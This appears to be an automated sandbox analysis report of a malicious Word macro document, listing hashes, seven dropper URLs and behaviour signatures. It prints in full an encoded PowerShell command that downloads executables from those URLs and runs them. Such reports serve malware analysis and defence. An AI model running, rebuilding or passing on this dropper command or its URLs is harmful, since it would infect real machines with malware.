Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15/09/2024, 09:02

General

  • Target

    e222f7c5d4f17f4222323441f4ca1f63_JaffaCakes118.doc

  • Size

    138KB

  • MD5

    e222f7c5d4f17f4222323441f4ca1f63

  • SHA1

    9be04e3a57a50e71d72ca650fcac4438c3913fea

  • SHA256

    13b98d2f0d07581934fcff17efd69c9924d5cc1d0bb874c28eaaeb497cba7bb4

  • SHA512

    cc6dc0e635db62499261099ec38bf1cb3db93a27c92f3252da3f26b8afa35f514eac0a67e592709021bead46da7d4d3e1fe67cb42d027ec84e856e0606a089d8

  • SSDEEP

    1536:mxRD3bNqfNpu39IId5a6XP3Mg8afyqcTqc380Y:ER1qf69xak3Mgxy7qI80Y

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://edu.jmsvclass.com/wp-includes/sZmjSq/

exe.dropper

http://darkblessing.net/e4wftkpn/KNAO9/

exe.dropper

http://trancisconsulting.com/wp-admin/EEoF/

exe.dropper

http://devanyastore.com/wp-content/9J56juA/

exe.dropper

http://healthcureathome.com/ALFA_DATA/iKSdCK6/

exe.dropper

http://www.szwymall.com/wp-content/j29mvS/

exe.dropper

http://www.jornco.com/wp-admin/UT0xBJw/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e222f7c5d4f17f4222323441f4ca1f63_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1488
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABNAHYAbQA5AHgAZABwAD0AKAAoACcARwB2AHkANgAnACsAJwB0ACcAKwAnAF8AJwApACsAJwA4ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAHIATwBGAGkATABlAFwAVAA0AFkAeQBlAFIAOABcAGgASgBfAE0ARgBaAFYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAGAAVQByAGkAYABUAGAAWQBwAFIATwBgAFQATwBDAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAsACAAdABsAHMAJwArACcAMQAxACwAJwApACsAJwAgACcAKwAnAHQAbAAnACsAJwBzACcAKQA7ACQAQgAzAHUAbwBuAHQAMQAgAD0AIAAoACgAJwBPAG4AagAnACsAJwAyACcAKQArACgAJwBxACcAKwAnAG0AegAnACkAKwAnAHQAJwApADsAJABJAGQAdAA2ADQAZQBuAD0AKAAoACcARAA4ACcAKwAnADMAaAAnACkAKwAoACcANAAnACsAJwB1AHkAJwApACkAOwAkAFoAcgB0AG8AMwA2AGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAJwBHACcAKwAoACcATAAnACsAJwBUADQAJwApACsAKAAnAHkAJwArACcAeQBlACcAKQArACgAJwByACcAKwAnADgAYwAnACkAKwAnAEcAJwArACgAJwBMACcAKwAnAEgAagBfACcAKQArACgAJwBtACcAKwAnAGYAegB2AGMARwBMACcAKQApAC4AIgBSAGUAYABQAEwAQQBDAGUAIgAoACgAWwBDAGgAYQByAF0AOQA5ACsAWwBDAGgAYQByAF0ANwAxACsAWwBDAGgAYQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEIAMwB1AG8AbgB0ADEAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABJAG8AdAA1AGMAegBrAD0AKAAoACcATQAnACsAJwAzADMAcQA2ADAAJwApACsAJwBmACcAKQA7ACQATgByAG8AbQBvAGcAcgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgB3AGUAQgBDAEwASQBFAG4AdAA7ACQARQBvADYAMQB4AGMAbwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBlACcAKwAnAGQAdQAnACsAJwAuAGoAJwArACgAJwBtAHMAJwArACcAdgAnACkAKwAoACcAYwBsAGEAcwBzAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAALQBpAG4AJwArACcAYwAnACkAKwAoACcAbAB1AGQAJwArACcAZQBzACcAKQArACcALwBzACcAKwAoACcAWgAnACsAJwBtAGoAJwApACsAKAAnAFMAcQAnACsAJwAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZABhAHIAJwApACsAJwBrACcAKwAoACcAYgBsAGUAcwAnACsAJwBzACcAKQArACcAaQBuACcAKwAoACcAZwAuACcAKwAnAG4AZQAnACkAKwAoACcAdAAvAGUAJwArACcANAB3AGYAdAAnACkAKwAnAGsAJwArACcAcABuACcAKwAoACcALwBLAE4AQQBPADkALwAqAGgAdAB0AHAAOgAvAC8AdAAnACsAJwByAGEAJwArACcAbgAnACsAJwBjAGkAJwArACcAcwAnACsAJwBjAG8AbgBzACcAKQArACgAJwB1ACcAKwAnAGwAdABpACcAKQArACcAbgBnACcAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGEAJwApACsAJwBkACcAKwAoACcAbQBpAG4ALwAnACsAJwBFAEUAJwApACsAJwBvAEYAJwArACcALwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBkAGUAdgBhAG4AJwArACcAeQBhAHMAJwArACcAdABvAHIAZQAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBjAG8AJwArACcAbgAnACsAJwB0AGUAJwApACsAJwBuACcAKwAoACcAdAAvACcAKwAnADkASgA1ADYAJwApACsAJwBqAHUAJwArACcAQQAnACsAKAAnAC8AJwArACcAKgBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AaAAnACsAKAAnAGUAJwArACcAYQBsAHQAaABjAHUAJwArACcAcgBlACcAKQArACcAYQAnACsAKAAnAHQAJwArACcAaABvAG0AJwApACsAKAAnAGUALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBBAEwARgAnACsAJwBBAF8AJwApACsAJwBEAEEAJwArACcAVAAnACsAKAAnAEEALwAnACsAJwBpACcAKQArACgAJwBLACcAKwAnAFMAZAAnACkAKwAnAEMAJwArACgAJwBLACcAKwAnADYALwAqAGgAJwArACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAJwB3AHcAJwArACcAdwAnACsAJwAuAHMAJwArACgAJwB6AHcAJwArACcAeQAnACkAKwAnAG0AJwArACgAJwBhAGwAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AJwArACcAdAAvACcAKQArACcAagAnACsAKAAnADIAJwArACcAOQBtACcAKQArACgAJwB2ACcAKwAnAFMALwAqAGgAdAB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvAHcAdwAnACsAJwB3AC4AJwApACsAKAAnAGoAbwByAG4AYwBvAC4AYwBvACcAKwAnAG0AJwArACcALwB3ACcAKwAnAHAAJwArACcALQAnACkAKwAnAGEAJwArACgAJwBkACcAKwAnAG0AaQBuACcAKQArACgAJwAvACcAKwAnAFUAVAAwACcAKQArACgAJwB4AEIAJwArACcASgB3AC8AJwApACkALgAiAHMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgBtAGwAXwA4AHIAcQA9ACgAKAAnAEgAJwArACcAeQBvACcAKQArACgAJwBkAGUAJwArACcAbAAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBrAHUAXwB0AGQAXwAgAGkAbgAgACQARQBvADYAMQB4AGMAbwApAHsAdAByAHkAewAkAE4AcgBvAG0AbwBnAHIALgAiAEQAYABvAGAAdwBuAEwATwBhAGQAZgBpAGwARQAiACgAJABCAGsAdQBfAHQAZABfACwAIAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAUABuAGYAOQBmAHoAdAA9ACgAKAAnAFYAZwBvAGEAJwArACcAbgAnACkAKwAnADkAJwArACcAbQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgByAHQAbwAzADYAZgApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAzADIANQAzACkAIAB7AC4AKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAWABvAHEAaQB5AHIANQA9ACgAKAAnAEIAdQBvACcAKwAnAGwAaAAnACkAKwAnAGkAZgAnACkAOwBiAHIAZQBhAGsAOwAkAFkANgByADUAaAAxAGUAPQAoACcAUwAnACsAJwBmACcAKwAoACcAMgBkAHEAJwArACcAZABuACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAG0AaQA5AGsAdgA5AD0AKAAnAEkAXwAnACsAKAAnAGQAZgBlACcAKwAnAG0AeAAnACkAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2796

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            19KB

            MD5

            90089d5498af1ce52c2ee3e1b27abfaa

            SHA1

            ef81c6f25dfc24ddd53c4e7a0518d3da8125581c

            SHA256

            429529e6a8acd1135c8ec2d1f523f83199d9428f36e8be044d465518f3ca71ee

            SHA512

            465fdc20af1e097138b0da808a6e2896c33492482203054a5ddef7cac11a7cfc797696e6f2a145518e0e12d7bce4cf5f74a4641cd3345905f029fb2b3e547dee

          • memory/1928-46-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-58-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-6-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-7-0x0000000006520000-0x0000000006620000-memory.dmp

            Filesize

            1024KB

          • memory/1928-29-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-28-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-27-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-0-0x000000002F901000-0x000000002F902000-memory.dmp

            Filesize

            4KB

          • memory/1928-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

            Filesize

            44KB

          • memory/1928-76-0x0000000070B3D000-0x0000000070B48000-memory.dmp

            Filesize

            44KB

          • memory/1928-44-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-75-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1928-57-0x0000000070B3D000-0x0000000070B48000-memory.dmp

            Filesize

            44KB

          • memory/1928-45-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-59-0x0000000005B00000-0x0000000005C00000-memory.dmp

            Filesize

            1024KB

          • memory/1928-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2796-53-0x0000000001E00000-0x0000000001E08000-memory.dmp

            Filesize

            32KB

          • memory/2796-52-0x000000001B690000-0x000000001B972000-memory.dmp

            Filesize

            2.9MB